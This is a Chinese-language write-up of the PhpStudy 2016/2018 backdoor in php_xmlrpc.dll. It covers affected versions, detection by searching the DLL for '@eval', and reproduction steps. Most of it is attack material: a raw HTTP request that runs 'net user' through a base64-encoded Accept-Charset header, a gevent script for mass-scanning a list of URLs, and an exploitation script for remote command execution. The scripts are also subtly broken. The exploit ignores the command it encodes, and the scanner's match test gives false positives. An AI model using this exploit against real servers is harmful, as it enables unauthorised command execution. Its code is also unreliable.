PhpStudy后门漏洞

1.影响版本

phpstudy 2016版php-5.2.17
phpstudy 2016版php-5.4.45
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45

2.后门检测分析

1）通过分析，后门代码存在于\ext\php_xmlrpc.dll模块中
（1）phpStudy2016路径：
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
（2）phpStudy2018路径：
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
2）用notepad打开此文件查找@eval，文件存在@eval(%s(‘%s’))证明漏洞存在

3.漏洞复现

1）启动phpstudy 2018版php-5.4.45

2）访问http://127.0.0.1/index.php

（1）按照下面漏洞exp，将Accept-Charset字段修改为base64加密的命令“phpinfo();”

（2）将Accept-Charset字段修改为base64加密的命令“echo system("net user");”

4.后门exp

GET /index.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7	
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 5.后门检测脚本

# !/usr/bin/env python
# -*- coding:utf-8 -*-

import gevent
from gevent import monkey

gevent.monkey.patch_all()
import requests as rq


def file_read(file_name="url.txt"):
    with open(file_name, "r") as f:
        return [i.replace("\n", "") for i in f.readlines()]


def check(url):
    '''
    if "http://" or "https://" not in url:
        url = "https://" + url
    '''
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Sec-Fetch-Site': 'none',
        'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==',  # 输出 eeSzxu92nIDAb
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    try:
        res = rq.get(url, headers=headers, timeout=20)
        if res.status_code == 200:
            if res.text.find('eeSzxu92nIDAb'):
                print("[存在漏洞] " + url)
    except:
        print("[超时] " + url)


if __name__ == '__main__':
    print("phpStudy 批量检测 (需要 gevent,requests 库)")
    print("使用之前，请将URL保存为 url.txt 放置此程序同目录下")
    input("任意按键开始执行..")
    tasks = [gevent.spawn(check, url) for url in file_read()]
    print("正在执行...请等候")
    gevent.joinall(tasks)
    wait = input("执行完毕 任意键退出...")

6.后门利用脚本

# !/usr/bin/env python
# -*- coding:utf-8 -*-

import requests
import base64


def backdoor(url, command="system('calc.exe');"):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Sec-Fetch-Site': 'none',
        'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==',
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    command = base64.b64encode(command.encode('utf-8'))
    command = str(command, 'utf-8')
    result = requests.get(url, headers=headers, verify=False)
    if result.status_code == "200":
        print("执行完成")
    a = input("任意键退出...")


url = input("输入URL(例如:http://127.0.0.1:228/xx.php)\n")
command = input("输入命令 默认为 system('calc.exe'); (不想输入直接回车)\n")
backdoor(url, command)